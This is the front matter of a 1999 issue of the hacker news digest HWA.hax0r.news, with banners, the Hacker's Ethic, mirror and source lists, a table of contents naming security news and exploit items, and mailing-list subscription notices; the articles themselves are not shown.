
      
      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 43 Volume 1 1999   Nov 21st 99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================

    Shit a week late again, another fucking cold, man I hate colds! fuck,
    anyway this issue covers Nov 14th - Nov 21st #44 will cover Nov 22nd to
    Nov 28th. Seen?
    
  ==========================================================================                             
    
    
        

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
                              
      
                    
  
        Today the spotlight may be on you, some interesting machines that
                   have accessed these archives recently...

                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
          
                             
                             
  There are some interesting machines among these, the *.nosc.mil boxes are
  from SPAWAR information warfare centres, good to see our boys keeping up
  with the news... - Ed                             
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
   
                     http://welcome.to/HWA.hax0r.news/                     
                                           
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
        Web site sponsored by CUBESOFT networks http://www.csoft.net
        check them out for great fast web hosting!
        
        http://www.csoft.net/~hwa
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       

     The Hacker's Ethic

     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer.
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endeavoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
                       


     New mirror sites
                
                http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
                http://net-security.org/hwahaxornews
                http://www.sysbreakers.com/hwa
                http://www.attrition.org/hosted/hwa/
                http://www.ducktank.net/hwa/issues.html.
                http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                http://www.attrition.org/~modify/texts/zines/HWA/
                
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
              ** Some issues are not located on these sites since they exceed
                 the file size limitations imposed by the sites :-( please
                 only use these if no other recourse is available.
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #43

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   
    
    **************************************************************************   

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

     
                        Eris Free Net #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on from the zine and around  ***
    *** the zine or just to hang out, we get some interesting visitors you ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************

      
    
    


  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those who use it properly". This is our new motto.

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=
  

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Bubbleboy email worm description.................................
    04.0  .. WinNT.Infis.4608 new Win NT virus................................
    05.0  .. OSALL Interview with Flipz 1st person to deface a Microsoft site.
    06.0  .. Online encrypted privacy for email and WWW.......................
    07.0  .. More on the Chris Buckley Saga...................................
    08.0  .. Security Practices Today, Or Lack Thereof .......................
    09.0  .. Internet Wiretapping Still a Possibility ........................
    10.0  .. Stock Prices Manipulated in China ...............................
    11.0  .. Rumours: Vent of level Seven raided by FBI ......................
    12.0  .. Electronic Information Stolen from Egypt ........................
    13.0  .. Aleph One Gives NPR Interview ...................................
    14.0  .. South American Con Announced ....................................
    15.0  .. New Ezines Released .............................................
    16.0  .. BO2K Marketing Plan (Very funny reading, check this out).........
    17.0  .. Canada Loses Classified Documents ...............................
    18.0  .. Guilty Plea in Media City Defacement ............................
    19.0  .. Hong Kong's Department of Highways Defaced ......................
    20.0  .. You Have No Privacy Anyway (scary) ..............................
    21.0  .. ACLU to Monitor Echelon .........................................
    22.0  .. NSA Gets Patent on Analyzing Speech .............................
    23.0  .. New Ezine and Web Site - PrivacyPlace Launches ..................
    24.0  .. Vendor Response Archive .........................................
    25.0  .. Another from Cuartango: More Microsoft Security Holes ...........
    26.0  .. DOD helps Local Cops in Fighting CyberCrime .....................
    27.0  .. BSA Busts IRC Pirates ...........................................
    28.0  .. US Concerned About Chinese Statements ...........................
    29.0  .. The state of the net in Bulgaria.................................
    30.0  .. More on the PIII chip ID.........................................
    31.0  .. Security Lawsuits Next After Y2K ................................
    32.0  .. Another Singaporean Cyber Intruder Pleads Guilty ................
    33.0  .. SingCERT Releases Year to Date Stats ............................
    34.0  .. Canadian Telecom Firm Gets Security Clearance ...................
    35.0  .. Dell Gets Some FunLove ..........................................
    36.0  .. Melissa Hits Disney .............................................
    37.0  .. How the Anti Virus Industry Works ...............................
    38.0  .. FBI Releases Anti Cyber Crime Video .............................
    39.0  .. Adobe Introduces Potentially Flawed Security System .............
    40.0  .. The 'Enemy' Speaks at Security Conference .......................
    41.0  .. Defense Fund Started for Warez4Cable + interviews................
    42.0  .. Menwith Hill To Get Upgrade Monies ..............................
    43.0  .. CSIS Lost Classified Floppy Disk (hahaha)........................
    44.0  .. Hitachi Chip May Prevent Use of Third-party Printer Cartridges ..
    45.0  .. NEW MACRO VIRUS OUT THERE........................................
    46.0  .. GLOBALNET, CROATIAN ISP COMPROMISED..............................
    47.0  .. SEC FILES CHARGES................................................
    48.0  .. G6 FTP SERVER v2.0 PROBLEMS......................................
    49.0  .. RED HAT SECURITY ADVISORY........................................
    50.0  .. HPING............................................................
    51.0  .. RPM UPDATE HELPING UTILITY.......................................
    52.0  .. WebBBS Ver2.13 Exploit / Shadow Penguin Security.................
    53.0  .. SENATE.GOV BITES THE DUST........................................
    54.0  .. NEW NESSUS.......................................................
    55.0  .. DELEGATE BUFFER OVERFLOWS .......................................
    56.0  .. SSH PROBLEMS.....................................................
    57.0  .. TORVALDS: COUPLE OF QUESTIONS....................................
    58.0  .. 2K PREPARATIONS CAUSED PROBLEMS..................................
    59.0  .. IS MICROSOFT TO BLAME FOR Y2K?...................................
    60.0  .. $50 MILLIONS FOR Y2K CENTER......................................
    61.0  .. EYES ON EXEC 2.32................................................
    62.0  .. CHECKPOINT AND LINUX.............................................
    63.0  .. NOVELL SIMPLIFIES THINGS.........................................
    64.0  .. RPC.NFSD PROBLEMS................................................
    65.0  .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
    66.0  .. RFP9906 - RFPoison...............................................
        
   
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
             
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       

    Websites;
    
    sAs72.......................: http://members.tripod.com/~sAs72/
    Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
    "CC" the bugtraq reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that
    reproduction of those words without your permission in any medium outside the distribution of this list may be
     challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         from our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
